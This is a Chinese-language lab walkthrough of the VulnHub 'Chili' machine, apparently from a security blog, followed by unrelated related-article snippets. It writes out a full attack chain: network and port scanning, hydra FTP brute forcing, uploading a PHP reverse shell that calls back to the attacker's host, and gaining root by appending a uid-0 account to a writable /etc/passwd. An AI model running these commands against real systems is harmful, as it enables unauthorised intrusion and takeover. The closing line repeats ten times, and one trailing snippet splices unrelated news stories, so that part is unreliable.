vulnhub之Chili的实践

VSole2023-01-03 09:12:49

今天实践的是vulnhub的Chili镜像,

下载地址,https://download.vulnhub.com/chili/Chili.ova,

用workstation导入,做地址扫描,sudo netdiscover -r 192.168.58.0/24,

170就是靶机,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.170,

有ftp服务,没扫描到匿名账户,上hydra做密码暴破,用户名就用chili,

hydra 192.168.58.170 ftp -l chili -P /usr/share/wordlists/rockyou.txt,

获取到用户名密码,chili/a1b2c3d4,

ftp登录进去,发现可文件上传的目录,/var/www/html/.nano,

直接用kali上自带的web shell文件,

cp /usr/share/webshells/php/php-reverse-shell.php shell.php,

修改好参数,

$ip = '192.168.58.168'; // CHANGE THIS

$port = 4444;      // CHANGE THIS

上传到ftp服务的/var/www/html/.nano里,

kali攻击机上开个反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.58.170/.nano/shell.php,

反弹shell就过来了,

改成交互式shell,python3 -c 'import pty; pty.spawn("/bin/bash")',

发现passwd文件在当前用户下是可写的,ls -lna /etc/passwd,

造一个root权限的用户进去,

echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,

切到hacker用户,su hacker,id确认是root,

本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束。

shellhacker
本作品采用《CC 协议》,转载必须注明作者和本文链接
反弹Shell大全与原理
2023-04-25 10:15:00
reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。对方主机在局域网内,从外网无法直接访问。对方主机上存在WAF,对主动连接发来的请求数据检测严格,而对向外发出的请求不进行检测或检测较少。对方由于防火墙等限制,对方机器只能发送请求,不能接收请求。在渗透测试过程中,得到webshell后一般我们会反弹shell。反弹shell原理A主机开启9090端口的tcp服务
安全研究人员指出,网络攻击者不仅仅使用了 Sliver 后门,还部署了 BYOVD恶意软件,意图破坏安全产品并安装反向 shell。这一发现证实,威胁攻击者正在准备采用基于 Go 语言编写的合法渗透测试工具 Sliver 作为 Cobalt Strike 和 Metasploit 的替代品。
The Hacker News 网站披露,网络会议服务 Apache OpenMeetings 存在多个安全漏洞,Sonar 漏洞研究员 Stefan Schiller 表示网络攻击者可以利用这些漏洞夺取管理帐户的控制权,并在易受影响的服务器上执行恶意代码。
据The Hacker News 2月2日消息,自 2021 年 9 月以来,全球至少有 1200 台 Redis 数据库服务器被一个名为 HeadCrab 的恶意软件攻击,并且利用这些受感染的服务器在线扫描更多目标。截至目前,中国、马来西亚、印度、德国、英国和美国已记录到大量感染,攻击者的来历也尚未明确。为此,专家建议用户不要将 Redis 服务器直接暴露在互联网上。
Ceye DNS:DNS oob平台 http://ceye.io/. TLS证书信息查询Censys:https://censys.io. 网络空间搜索Fofa:https://fofa.info/
攻击溯源&溯源反制
Ceye DNS:DNS oob平台 http://ceye.io/. TLS证书信息查询Censys:https://censys.io. 网络空间搜索Fofa:https://fofa.info/
据了解,Trigona勒索软件组织已经发起了多次攻击事件。该团伙雇佣大量网络刷手进行虚假交易,并为商家提供销量和好评,赚取佣金并抽取分成。经过5个多月的缜密侦查,警方彻底查清并打掉该团伙,抓获涉案嫌疑人23名。目前,案件正在进一步办理中。近日,其遭受勒索软件攻击,旗下AlohaPOS系统平台发生中断。勒索团伙BlackCat/ALPHV已经宣布对此负责,并称已获取了NCR客户的凭证。目前,NCR正在调查该事件。
今天实践的是vulnhub的sunset/twilight镜像,下载地址,https://download.
VSole
网络安全专家